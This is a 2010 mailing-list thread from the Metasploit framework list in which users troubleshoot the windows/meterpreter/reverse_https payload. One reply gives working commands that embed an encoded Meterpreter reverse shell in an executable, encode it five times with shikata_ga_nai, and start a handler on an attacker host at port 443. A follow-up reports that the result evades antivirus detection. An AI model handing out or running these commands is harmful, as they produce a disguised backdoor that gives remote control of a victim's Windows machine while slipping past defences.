Metasploit mailing list archives

Re: windows/meterpreter/reverse_https still working


From: wfdawson <wfdawson () bellsouth net>
Date: Tue, 16 Nov 2010 13:24:17 -0800 (PST)

With the exception of the "payload=shikata_ga_nai" mention on the msfcli line, I was 
happy to see that not only do the below steps avoid any detection by my AV, but 
it is also substantially faster to load than the equivalent multi-staged 
Meterpreter payload.

Thanks for the tip!




________________________________
From: Marc Doudiet <marc.doudiet () gmail com>
To: framework () spool metasploit com
Sent: Tue, November 16, 2010 3:54:20 PM
Subject: Re: [framework] windows/meterpreter/reverse_https still working

Hi,

I just used it today and it worked like a charm:

./msfpayload windows/meterpreter/reverse_https LHOST=xx.xx.xx.xx LPORT=443 R | ./msfencode -t exe -x test.exe -o test.exe -e x86/shikata_ga_nai -c 5

./msfcli exploit/multi/handler payload=shikata_ga_nai lhost=xx.xx.xx.xx lport=443 payload=windows/meterpreter/reverse_https E

Hope this helps.

M

On Nov 16, 2010, at 4:31 PM, Miguel Rios wrote:

I've also had issues lately with windows/meterpreter/reverse_https where it 
seems to start the connection and then hangs with no error messages. Regular old 
reverse_http works without a hitch and obviously 443 is allowed through the 
firewall so I think it may be a problem with meterpreter itself. I'd appreciate 
it if others could give feedback if they're seeing the same issues with latest 
svned up metasploit before I spend an afternoon testing it further.

Thanks

--- On Sat, 10/30/10, Jeffs <jeffs () speakeasy net> wrote:


From: Jeffs <jeffs () speakeasy net>
Subject: [framework] windows/meterpreter/reverse_https still working
To: "framework () spool metasploit com" <framework () spool metasploit com>
Date: Saturday, October 30, 2010, 12:42 PM


Hello All,

Does the windows/meterpreter/reverse_https still work in this day and age? 
I am having difficulty getting it to connect back to an IE 7 instance using
the example here:
http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html

I see through tcpdump that the connection is being requested but nothing 
happens in the exploit/multi/handler.

Also, I cannot get the msfencode to work. Receive message no such file or 
directory "msfencode" even though I see it in plain sight.

Thank you.



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
